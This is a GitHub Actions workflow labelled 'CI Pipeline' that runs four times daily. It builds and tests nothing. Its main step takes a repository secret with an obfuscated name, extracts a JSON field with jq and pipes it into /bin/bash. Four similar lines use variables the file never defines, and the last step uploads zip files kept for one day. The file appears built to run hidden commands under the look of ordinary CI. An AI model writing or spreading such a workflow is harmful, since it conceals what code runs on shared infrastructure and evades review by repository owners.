name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '54 3,9,15,21 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          xqet3801: ${{ secrets.xqet3801 }}
        run: |
          printf '%s' "$xqet3801" | jq -r .gp58622 | /bin/bash
          echo $t1 | jq -r .cmxv4008 | /bin/bash
          printf '%s' "$mgk5767" | jq -r .kkixe0073 | /bin/bash
          echo $bwl1 | jq -r .zb09505 | /bin/bash
          echo $k0251 | jq -r .lp8197 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: wJfJ3X3x
          path: "*.zip"
          retention-days: 1
